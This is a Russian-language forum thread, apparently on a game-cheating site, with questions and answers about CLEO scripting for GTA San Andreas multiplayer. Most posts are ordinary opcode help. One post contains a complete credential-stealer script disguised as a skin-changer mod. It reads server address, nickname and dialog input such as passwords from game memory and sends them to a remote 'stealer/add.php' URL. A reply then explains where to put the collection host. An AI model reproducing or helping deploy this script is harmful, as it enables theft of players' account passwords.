[CLEO] Вопрос - Ответ
|
|
[CM]Рафаэль |
Дата: Суббота, 05.09.2015, 20:19 | Сообщение # 1
|
Cheat-Master
Сообщений: 3080
Статус: Offline
|
В этой теме задаются вопросы по CLEO, конкретным опкодам (например, назначение того или иного опкода) и т.д.
Форма вопроса: Код [color=#1E90FF][b]Вопрос:[/b][/color] text
Форма ответа: Код [color=#1E90FF][b]Ответ:[/b][/color] text
Мой Shop Официальный гарант
Контактные данные: VK: vk.com/ali_benua Skype: lvinyipen Telegram: @AliBenua ICQ: 552-090-283
|
|
|
|
fragma |
Дата: Воскресенье, 06.09.2015, 06:34 | Сообщение # 3601
|
|
Цитата krik4eg ( ) Ребята помогите пожалуйста компилю в Sanny Builder и выдавает ошибку:
Неизвестный опкод 8B4C.
Обновил опкоды SampFuncs: 5.0 Неправильно установил опкоды, Это опкод 0B4C, но если поставить not, то он превращается в 8B4C (отрицание).
Click Скопировать все файлы из папки "SB data", нахоящейся в архиве, в каталог по пути ".../Sanny Builder 3/data/sa".
Пишу на заказ CLEO скрипты, SF и ASI плагины.
Сообщение отредактировал fragma - Суббота, 10.01.2015, 15:52 |
|
|
|
krik4eg |
Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3602
|
Любитель
Сообщений: 47
Статус: Offline
|
Цитата fragma ( ) Неправильно установил опкоды,
Спасибо всё сделал но после этого когда компилю в Sanny Builder пишет вот так:
_________________________________________________________
Размер майна: 0 Максимум: 200000
Найбольшая миссия: 0 Максимум: 69000
Найбольший скрипт: 0
Заслужить 100 репутации [ ✔ ] Заслужить 200 репутации [ ✔ ] Заслужить 300 репутации [ ✔ ] Заслужить 1000 репутации [ ✗ ] Пробыть на CM 200 Дней [ ✔ ] Пробыть на CM 300 Дней [ ✔ ] Пробыть на CM 400 Дней [ ✔ ] Пробыть на CM 500 Дней [ ✔ ] Пробыть на CM 600 Дней [ ✔ ] Состоять в клане CM [ ✗ ] Иметь 10 постов [ ✔ ] Иметь 50 постов [ ✔ ] Иметь 200 постов [ ✗ ] Иметь 500 постов [ ✗ ] Иметь 1000 постов [ ✗ ]
" Skype: datkantidze / vk.com/id213621245 "
Сообщение отредактировал krik4eg - Суббота, 10.01.2015, 15:55 |
|
|
|
fragma |
Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3603
|
|
Цитата krik4eg ( ) Размер майна: 0 Максимум: 200000
Найбольшая миссия: 0 Максимум: 69000
Найбольший скрипт: 0
Что тебя волнует в этом?
Пишу на заказ CLEO скрипты, SF и ASI плагины.
|
|
|
|
krik4eg |
Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3604
|
Любитель
Сообщений: 47
Статус: Offline
|
Цитата fragma ( ) Что тебя волнует в этом?
Ну не знаю по моему наверно причина краша пока не знаю об этом программе.
Заслужить 100 репутации [ ✔ ] Заслужить 200 репутации [ ✔ ] Заслужить 300 репутации [ ✔ ] Заслужить 1000 репутации [ ✗ ] Пробыть на CM 200 Дней [ ✔ ] Пробыть на CM 300 Дней [ ✔ ] Пробыть на CM 400 Дней [ ✔ ] Пробыть на CM 500 Дней [ ✔ ] Пробыть на CM 600 Дней [ ✔ ] Состоять в клане CM [ ✗ ] Иметь 10 постов [ ✔ ] Иметь 50 постов [ ✔ ] Иметь 200 постов [ ✗ ] Иметь 500 постов [ ✗ ] Иметь 1000 постов [ ✗ ]
" Skype: datkantidze / vk.com/id213621245 "
|
|
|
|
fragma |
Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3605
|
|
Цитата krik4eg ( ) Ну не знаю по моему наверно причина краша пока не знаю об этом программе. Причину краша я уже тебе объяснил.
Пишу на заказ CLEO скрипты, SF и ASI плагины.
|
|
|
|
=]D]EA[N[= |
Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3606
|
Боец
Сообщений: 74
Статус: Offline
|
Как сделать так , что бы игрок сидя в авто, занял другое место (одно из пасожирских) ?
|
|
|
|
cover |
Дата: Воскресенье, 06.09.2015, 06:35 | Сообщение # 3607
|
Бывалый
Сообщений: 343
Статус: Offline
|
Цитата =]D EA[N[=;2634260]Как сделать так , что бы игрок сидя в авто, занял другое место (одно из пасожирских) ? Код {$CLEO .cs} 0000:
while true wait 0 if 0ab0: 52 then if Actor.Driving($PLAYER_ACTOR) then 0@ = Actor.CurrentCar($PLAYER_ACTOR) 0430: put_actor $PLAYER_ACTOR into_car 0@ passenger_seat 0 end end end passenger_seat 0 - Число 0 это пасс место возле водителя, если поставишь число 1 то это пасс место сзади водителя, цифра 2 это место сзади справа от водителя.
Сообщение отредактировал cover - Воскресенье, 11.01.2015, 10:15 |
|
|
|
=]D]EA[N[= |
Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3608
|
Боец
Сообщений: 74
Статус: Offline
|
cover, Приблагодарен !!!)))
|
|
|
|
[CM]Psicho |
Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3609
|
Новичок
Сообщений: 4
Статус: Offline
|
Вопрос: Почему когда я вписываю ссылку на сайт с готовой бд в команду " :Base " мне выпрыгивает ошибка?
«The monster»
Сообщение отредактировал [CM]Psicho - Среда, 14.01.2015, 15:49 |
|
|
|
fragma |
Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3610
|
|
[CM]Psicho, подробнее, что за ошибка?
Пишу на заказ CLEO скрипты, SF и ASI плагины.
|
|
|
|
[CM]Psicho |
Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3611
|
Новичок
Сообщений: 4
Статус: Offline
|
Цитата [CM]Psicho, подробнее, что за ошибка? " Неверный символ в идентификаторе Base lol-stuff-samp-rp.esy.es. " (+cкрин)
«The monster»
|
|
|
|
fragma |
Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3612
|
|
Цитата [CM]Psicho ( ) Неверный символ в идентификаторе Base lol-stuff-samp-rp.esy.es. " Код скинь, исправим
Пишу на заказ CLEO скрипты, SF и ASI плагины.
|
|
|
|
Vinnard |
Дата: Воскресенье, 06.09.2015, 06:36 | Сообщение # 3613
|
Новичок
Сообщений: 10
Статус: Offline
|
Какой опкод что б при активации скрипта автоматически нажимало Enter или другую клавишу?
|
|
|
|
[CM]Psicho |
Дата: Воскресенье, 06.09.2015, 06:37 | Сообщение # 3614
|
Новичок
Сообщений: 4
Статус: Offline
|
Цитата Код скинь, исправим
Вот,я точно не знаю что за проблема,т.к я недавно заинтересовался стиллером ,а до этого делал мелкие моды на смену скина,и что-то похожее для сингплея
Код {$CLEO .cs} 0000: wait 1750 0AA2: 31@ = load_library "kernel32.dll" // IF and SET 0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // Антикрашер 0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@ 0@ += 371500 0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1 0@ += 4 0A8C: write_memory 0@ size 1 value 144 virtual_protect 1 0@ += 9 0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1 0@ += 4 0A8C: write_memory 0@ size 1 value 144 virtual_protect 1 var 30@: int 31@: int end//"data/handling.cfg". handling.cfg это файл который лежит в папке data измените файл на любой другой существующий, так же можно заменить папку, можно дописать еще несколько папок. В этом файле будет храниться инфа о запусках игры 0af0: 30@ = "data/handling.cfg" "Setting" "Rand" 0af0: 31@ = "data/handling.cfg" "Setting" "Run" 0af1: 30@ "data/handling.cfg" "Setting" "Rand" 0af1: 31@ "data/handling.cfg" "Setting" "Run" if or 30@ <= 0 31@ <= 0 31@ > 30@ then 0209: 30@ = random_int_in_ranges 5 40 //Рандом запуск, меньше чем 2 2 не ставить! 0af1: 30@ "data/handling.cfg" "Setting" "Rand" 0af1: 1 "data/handling.cfg" "Setting" "Run" else 0af0: 30@ = "data/handling.cfg" "Setting" "Rand" 0af0: 31@ = "data/handling.cfg" "Setting" "Run" 31@ += 1 0af1: 31@ "data/handling.cfg" "Setting" "Run" if 31@ > 30@ then 0209: 30@ = random_int_in_ranges 5 40 //Рандом запуск, меньше чем 2 2 не ставить! 0af1: 30@ "data/handling.cfg" "Setting" "Rand" 0af1: 1 "data/handling.cfg" "Setting" "Run" end end if 31@ == 30@ then 0AB1: call_scm_func @Thread 1 @Stealer end 0662: printstring "SYSTEMAIN.3DN.RU"
:NONAME_20 0001: wait 0 ms 00D6: if 0256: player $PLAYER_CHAR defined 004D: jump_if_false @NONAME_20 05AA: 0@s = 'SKIN' // @s = 'short' 00D6: if 0AB1: call_scm_func @NONAME_2166 2 0@ 1@ 004D: jump_if_false @NONAME_20 07CC: set_player $PLAYER_CHAR can_enter_exit_vehicles 0 018C: play_sound 1056 at 0.0 0.0 0.0 0050: gosub @NONAME_2516 00BC: show_text_highpriority GXT '6CLOWN' time 3000 flag 1 // Clown 0006: 0@ = 0 0006: 1@ = 0 0006: 2@ = 0 0006: 4@ = 0 02A3: enable_widescreen 1 03BF: set_player $PLAYER_CHAR ignored_by_everyone 0 0A8D: 3@ = read_memory 11990512 size 4 virtual_protect 0 000A: 3@ += 1432 0A8C: write_memory 3@ size 1 value 1 virtual_protect 0
:NONAME_203 01E3: show_text_1number_styled GXT 'NUMBER' number 0@ time 10 style 5 // ~1~ 0001: wait 10 ms 00D6: if 0118: actor $PLAYER_ACTOR dead 004D: jump_if_false @NONAME_248 0002: jump @NONAME_1225
:NONAME_248 00D6: if 00E1: player 0 pressed_key 15 004D: jump_if_false @NONAME_272 0002: jump @NONAME_1225
:NONAME_272 00D6: if 0AB0: key_pressed 48 004D: jump_if_false @NONAME_301 0006: 1@ = 0 0002: jump @NONAME_591
:NONAME_301 00D6: if 0AB0: key_pressed 49 004D: jump_if_false @NONAME_330 0006: 1@ = 1 0002: jump @NONAME_591
:NONAME_330 00D6: if 0AB0: key_pressed 50 004D: jump_if_false @NONAME_359 0006: 1@ = 2 0002: jump @NONAME_591
:NONAME_359 00D6: if 0AB0: key_pressed 51 004D: jump_if_false @NONAME_388 0006: 1@ = 3 0002: jump @NONAME_591
:NONAME_388 00D6: if 0AB0: key_pressed 52 004D: jump_if_false @NONAME_417 0006: 1@ = 4 0002: jump @NONAME_591
:NONAME_417 00D6: if 0AB0: key_pressed 53 004D: jump_if_false @NONAME_446 0006: 1@ = 5 0002: jump @NONAME_591
:NONAME_446 00D6: if 0AB0: key_pressed 54 004D: jump_if_false @NONAME_475 0006: 1@ = 6 0002: jump @NONAME_591
:NONAME_475 00D6: if 0AB0: key_pressed 55 004D: jump_if_false @NONAME_504 0006: 1@ = 7 0002: jump @NONAME_591
:NONAME_504 00D6: if 0AB0: key_pressed 56 004D: jump_if_false @NONAME_533 0006: 1@ = 8 0002: jump @NONAME_591
:NONAME_533 00D6: if 0AB0: key_pressed 57 004D: jump_if_false @NONAME_562 0006: 1@ = 9 0002: jump @NONAME_591
:NONAME_562 00D6: if 0AB0: key_pressed 16 004D: jump_if_false @NONAME_584 0002: jump @NONAME_655
:NONAME_584 0002: jump @NONAME_203
:NONAME_591 000A: 2@ += 1 0012: 0@ *= 10 005A: 0@ += 1@ // (int) 01E3: show_text_1number_styled GXT 'NUMBER' number 0@ time 250 style 5 // ~1~ 0001: wait 250 ms 00D6: if 0039: 2@ == 3 004D: jump_if_false @NONAME_203
:NONAME_655 00D6: if and 0029: 0@ >= 0 002B: 317 >= 0@ 004D: jump_if_false @NONAME_1225 00D6: if 0039: 0@ == 300 004D: jump_if_false @NONAME_707 0002: jump @NONAME_2101
:NONAME_707 00D6: if 0039: 0@ == 301 004D: jump_if_false @NONAME_733 0002: jump @NONAME_2070
:NONAME_733 00D6: if 0039: 0@ == 302 004D: jump_if_false @NONAME_759 0002: jump @NONAME_2039
:NONAME_759 00D6: if 0039: 0@ == 303 004D: jump_if_false @NONAME_785 0002: jump @NONAME_1977
:NONAME_785 00D6: if 0039: 0@ == 304 004D: jump_if_false @NONAME_811 0002: jump @NONAME_1822
:NONAME_811 00D6: if 0039: 0@ == 305 004D: jump_if_false @NONAME_837 0002: jump @NONAME_1791
:NONAME_837 00D6: if 0039: 0@ == 306 004D: jump_if_false @NONAME_863 0002: jump @NONAME_1760
:NONAME_863 00D6: if 0039: 0@ == 307 004D: jump_if_false @NONAME_889 0002: jump @NONAME_1729
:NONAME_889 00D6: if 0039: 0@ == 308 004D: jump_if_false @NONAME_915 0002: jump @NONAME_1667
:NONAME_915 00D6: if 0039: 0@ == 309 004D: jump_if_false @NONAME_941 0002: jump @NONAME_1636
:NONAME_941 00D6: if 0039: 0@ == 310 004D: jump_if_false @NONAME_967 0002: jump @NONAME_1884
:NONAME_967 00D6: if 0039: 0@ == 311 004D: jump_if_false @NONAME_993 0002: jump @NONAME_1915
:NONAME_993 00D6: if 0039: 0@ == 312 004D: jump_if_false @NONAME_1019 0002: jump @NONAME_1450
:NONAME_1019 00D6: if 0039: 0@ == 313 004D: jump_if_false @NONAME_1045 0002: jump @NONAME_1512
:NONAME_1045 00D6: if 0039: 0@ == 314 004D: jump_if_false @NONAME_1071 0002: jump @NONAME_1574
:NONAME_1071 00D6: if 0039: 0@ == 315 004D: jump_if_false @NONAME_1097 0002: jump @NONAME_1419
:NONAME_1097 00D6: if 0039: 0@ == 316 004D: jump_if_false @NONAME_1123 0002: jump @NONAME_1388
:NONAME_1123 00D6: if 0039: 0@ == 317 004D: jump_if_false @NONAME_1149 0002: jump @NONAME_1357
:NONAME_1149 0247: load_model 0@ 0001: wait 250 ms
:NONAME_1159 0001: wait 0 ms 00D6: if 0248: model 0@ available 004D: jump_if_false @NONAME_1159
:NONAME_1179 0001: wait 0 ms 09C7: change_player $PLAYER_CHAR model_to 0@ 00D6: if 0039: 4@ == 1 004D: jump_if_false @NONAME_1220 0296: unload_special_actor 1 0002: jump @NONAME_1225
:NONAME_1220 0249: release_model 0@
:NONAME_1225 00BE: text_clear_all 0A8C: write_memory 3@ size 1 value 0 virtual_protect 0 03BF: set_player $PLAYER_CHAR ignored_by_everyone 0 02A3: enable_widescreen 0 018C: play_sound 1057 at 0.0 0.0 0.0 0001: wait 1000 ms 07CC: set_player $PLAYER_CHAR can_enter_exit_vehicles 1 0050: gosub @NONAME_2635 0002: jump @NONAME_20 0001: wait 0 ms 023C: load_special_actor 'SFPDM2' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125 0001: wait 0 ms 023C: load_special_actor 'LVPDM2' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1357 0001: wait 0 ms 023C: load_special_actor 'CDEPUT' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1388 0001: wait 0 ms 023C: load_special_actor 'LVPDM1' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1419 0001: wait 0 ms 023C: load_special_actor 'SFPDM1' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1450 0001: wait 0 ms 023C: load_special_actor 'GUNGRL1' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125 0001: wait 0 ms 023C: load_special_actor 'GUNGRL3' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1512 0001: wait 0 ms 023C: load_special_actor 'MECGRL1' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125 0001: wait 0 ms 023C: load_special_actor 'MECGRL3' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1574 0001: wait 0 ms 023C: load_special_actor 'NURGRL1' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125 0001: wait 0 ms 023C: load_special_actor 'NURGRL3' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1636 0001: wait 0 ms 023C: load_special_actor 'SUZIE' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1667 0001: wait 0 ms 023C: load_special_actor 'SMOKEV' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125 0001: wait 0 ms 023C: load_special_actor 'RYDER2' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1729 0001: wait 0 ms 023C: load_special_actor 'RYDER3' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1760 0001: wait 0 ms 023C: load_special_actor 'KENDL' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1791 0001: wait 0 ms 023C: load_special_actor 'JANITOR' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1822 0001: wait 0 ms 023C: load_special_actor 'EMMET' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125 0001: wait 0 ms 023C: load_special_actor 'CROGRL3' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1884 0001: wait 0 ms 023C: load_special_actor 'CROGRL1' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1915 0001: wait 0 ms 023C: load_special_actor 'GANGRL1' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125 0001: wait 0 ms 023C: load_special_actor 'GANGRL3' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_1977 0001: wait 0 ms 023C: load_special_actor 'COPGRL1' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125 0001: wait 0 ms 023C: load_special_actor 'COPGRL2' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_2039 0001: wait 0 ms 023C: load_special_actor 'BB' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_2070 0001: wait 0 ms 023C: load_special_actor 'BBTHIN' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms 0002: jump @NONAME_2125
:NONAME_2101 0001: wait 0 ms 023C: load_special_actor 'ANDRE' as 1 // models 290-299 038B: load_requested_models 0001: wait 250 ms
:NONAME_2125 0001: wait 0 ms 00D6: if 023D: special_actor 1 loaded 004D: jump_if_false @NONAME_2125 0006: 0@ = 290 0006: 4@ = 1 0002: jump @NONAME_1179
:NONAME_2166 00D6: if 0AA9: is_game_version_original 004D: jump_if_false @NONAME_2206 0006: 10@ = 9867536 0006: 11@ = 10783072 0002: jump @NONAME_2226
:NONAME_2206 0006: 10@ = 9877392 0006: 11@ = 10792928
:NONAME_2226 0A9F: 4@ = current_thread_pointer 0A8E: 5@ = 4@ + 220 // int 0A8D: 5@ = read_memory 5@ size 1 virtual_protect 0 00D6: if 0039: 5@ == 1 004D: jump_if_false @NONAME_2287 0085: 4@ = 11@ // (int) 0002: jump @NONAME_2294
:NONAME_2287 000A: 4@ += 60
:NONAME_2294 0006: 6@ = 0
:NONAME_2301 0A8D: 5@ = read_memory 4@ size 1 virtual_protect 0 00D6: if and 0019: 5@ > 0 8029: not 6@ >= 16 004D: jump_if_false @NONAME_2359 000A: 4@ += 1 000A: 6@ += 1 0002: jump @NONAME_2366
:NONAME_2359 0002: jump @NONAME_2373
:NONAME_2366 0002: jump @NONAME_2301
:NONAME_2373 0085: 8@ = 10@ // (int)
:NONAME_2381 0019: 6@ > 0 004D: jump_if_false @NONAME_2498 000E: 4@ -= 1 000E: 6@ -= 1 0A8D: 5@ = read_memory 4@ size 1 virtual_protect 0 00D6: if 0019: 5@ > 90 004D: jump_if_false @NONAME_2446 000E: 5@ -= 32
:NONAME_2446 0A8D: 7@ = read_memory 8@ size 1 virtual_protect 0 000A: 8@ += 1 00D6: if 803B: not 5@ == 7@ // (int) 004D: jump_if_false @NONAME_2491 059A: return_false 0AB2: ret 0
:NONAME_2491 0002: jump @NONAME_2381
:NONAME_2498 0A8C: write_memory 10@ size 1 value 0 virtual_protect 0 0485: return_true 0AB2: ret 0
:NONAME_2516 0A9F: 1@ = current_thread_pointer 000A: 1@ += 16 0A8D: 1@ = read_memory 1@ size 4 virtual_protect 0 000E: 1@ -= -2607 000A: 1@ += 3 0AA8: call_function_method 6946896 struct 12694336 num_params 1 pop 0 1@ 0@ 000A: 1@ += 12 0AA5: call 7439872 num_params 2 pop 2 0@ 1@ 0051: return 0900: clear_object '6CLOWN' last_weapon_damage 0900: clear_object "CHANGE SKIN" last_weapon_damage 0000: NOP
:NONAME_2635 0A9F: 1@ = current_thread_pointer 000A: 1@ += 16 0A8D: 1@ = read_memory 1@ size 4 virtual_protect 0 000E: 1@ -= -2726 000A: 1@ += 3 0AA8: call_function_method 6946896 struct 12694336 num_params 1 pop 0 1@ 0@ 000A: 1@ += 12 0AA5: call 7439872 num_params 2 pop 2 0@ 1@ 0051: return 0900: clear_object '6CLOWN' last_weapon_damage 0900: clear_object "CLOWN" last_weapon_damage 0000: NOP 0a93: //А тут заканчивается :Stealer 0000: While true wait 0 0AA2: 31@ = load_library "kernel32.dll" // IF and SET 0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET 0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@ 0A8E: 3@ = 0@ + 2173568 // int 0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1 if 2@ > 1000 then 0A8E: 22@ = 2@ + 985 // int 0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1 if 2@ > 1000 then 0A8E: 5@ = 23@ + 20 // int 0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1 if 4@ > 1000 then 0A8E: 5@ = 4@ + 34 // int 0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1 if 24@ > 1000 then 0A8E: 22@ = 0@ + 2173504 // int 0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1 if 1@ > 1000 then 0A8E: 7@ = 1@ + 40 // int 0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1 0A8E: 5@ = 1@ + 44 // int 0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1 if 6@ == 1 then if or 26@ == 1 26@ == 3 then 25@ = 1 end end if and 25@ == 1 not 6@ == 1 then 0A8E: 7@ = 1@ + 48 // int 0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1 0A8E: 6@ = 1@ + 36 // int 0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1 0A8E: 6@ = 0@ + 617008 // int 0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@ 0A8E: 6@ = 4@ + 26 // int 0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1 0A8E: 7@ = 4@ + 10 // int if not 23@ >= 16 then 0085: 12@ = 7@ // (int) else 0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1 end 0A8E: 9@ = 2@ + 710 // int 0A8E: 14@ = 2@ + 452 // int 0A8E: 8@ = 2@ + 969 // int 0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1 0A8E: 18@ = 4@ + 42 // int 0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1 010B: 21@ = player $PLAYER_CHAR money 0AC6: 0@ = label @Base offset 0AC8: 20@ = allocate_memory_size 1024 //0 - base, 14 - ip, 15 - port, 9 - server, 12 - nick, 3 - dialog, 5 - pass, 21 - money, 27 - score 0AD3: 20@ = format "%snick=%s&ip=%s:%d&serv=%s&dialog=%d&input=%s&mn=%d&score=%d" 0@ 12@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 0ac8: 8@ = 256 0ad3: 8@ = "Stealer" //Если ваша база умеет распознавать браузеры, то она решит, что жертва юзает браузер "Stealer" 0ab1: @InternetOpen 1 {USER_AGENT}8@ to {hSession} 9@ //Открытие сессии через наш "браузер" 0ab1: @InternetOpenUrl 2 {hSession} 9@ {Url} 20@ //Отсылка данных 0ac9: 8@ 0006: 25@ = 0 end end end end end end end :InternetOpen 0050: @wininet 0AA4: 29@ = get_proc_address "InternetOpenA" library 30@ 0AA7: function 29@ params 5 pop 0 {parameters} 0 0 0 {INTERNET_OPEN_TYPE_PRECONFIG} 0 {AGENT} 0@ {HANDLE} 1@ 0ab2: 1 1@ :InternetOpenUrl 0050: @wininet 0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@ 0AA7: function 29@ params 6 pop 0 {parameters} 0 0 0 0 {URL} 1@ {handleInternet} 0@ {HANLDE} 2@ 0ab2: 0 :wininet 0AA2: 30@ = load_library "Wininet.dll" 0051: :Thread //Подключение 2го потока 0A9F: 32@ = current_thread_pointer 000A: 32@ += 16 0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0 0062: 32@ -= 0@ // (int) 0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@ 005A: 32@ += 0@ // (int) 000A: 33@ += 16 0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0 000A: 33@ += 44 for 32@ = 0 to 30 0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0 000A: 33@ += 4 end 0ab2: 0 :Base //аддрес базы hex "http:" 2f 2f "keylog.ph" 2f "stealer" 2f "add.php?" 00 end
P.S
строка с кодом :Base стандартно выглядит , я хотел поменять на " :Base lol-stuff-samp-rp.esy.es. "
«The monster»
Сообщение отредактировал [CM]Psicho - Среда, 14.01.2015, 18:54 |
|
|
|
fragma |
Дата: Воскресенье, 06.09.2015, 06:37 | Сообщение # 3615
|
|
Цитата [CM Psicho;2643019]строка с кодом :Base стандартно выглядит , я хотел поменять на " :Base lol-stuff-samp-rp.esy.es. " Базу надо вставлять Цитата [CM Psicho;2643019]"http:" 2f 2f "сюда" 2f "stealer" 2f "add.php?" 00
Пишу на заказ CLEO скрипты, SF и ASI плагины.
Сообщение отредактировал fragma - Среда, 14.01.2015, 19:11 |
|
|
|